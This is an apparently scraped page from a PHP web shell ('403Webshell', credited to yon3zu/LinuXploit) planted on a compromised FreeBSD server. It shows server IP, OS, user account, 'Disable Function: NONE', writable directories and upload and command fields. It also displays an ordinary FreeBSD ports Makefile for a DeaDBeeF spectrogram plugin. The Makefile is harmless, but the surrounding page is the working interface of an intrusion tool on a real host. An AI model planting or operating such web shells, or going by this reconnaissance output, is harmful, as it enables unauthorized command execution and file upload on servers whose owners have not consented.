403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/audio/deadbeef-spectrogram-plugin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/audio/deadbeef-spectrogram-plugin/Makefile
PORTNAME=	deadbeef-spectrogram-plugin
DISTVERSION=	0.0.2015.01.10
CATEGORIES=	audio

MAINTAINER=	danfe@FreeBSD.org
COMMENT=	Spectrogram plugin for DeaDBeeF audio player
WWW=		https://github.com/cboxdoerfer/ddb_spectrogram

LICENSE=	GPLv2+

BUILD_DEPENDS=	${LOCALBASE}/include/deadbeef/deadbeef.h:audio/deadbeef
LIB_DEPENDS=	libfftw3.so:math/fftw3
RUN_DEPENDS:=	${BUILD_DEPENDS}

USE_GITHUB=	yes
GH_ACCOUNT=	cboxdoerfer
GH_PROJECT=	ddb_spectrogram
GH_TAGNAME=	8d1b371

USES=		gmake gnome pkgconfig

MAKE_JOBS_UNSAFE=	yes

OPTIONS_DEFINE=	GTK2 GTK3
OPTIONS_DEFAULT=	GTK2

.for v in 2 3
GTK${v}_USE=	GNOME=gtk${v}0
GTK${v}_ALL_TARGET=	gtk${v}

GTK${v}_PLIST_FILES=	lib/deadbeef/ddb_vis_spectrogram_GTK${v}.so

do-install-GTK${v}-on:
	@${MKDIR} ${STAGEDIR}${PREFIX}/lib/deadbeef
	${INSTALL_LIB} ${WRKSRC}/gtk${v}/ddb_vis_spectrogram_GTK${v}.so \
		${STAGEDIR}${PREFIX}/lib/deadbeef
.endfor

do-install:
	@${DO_NADA}

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit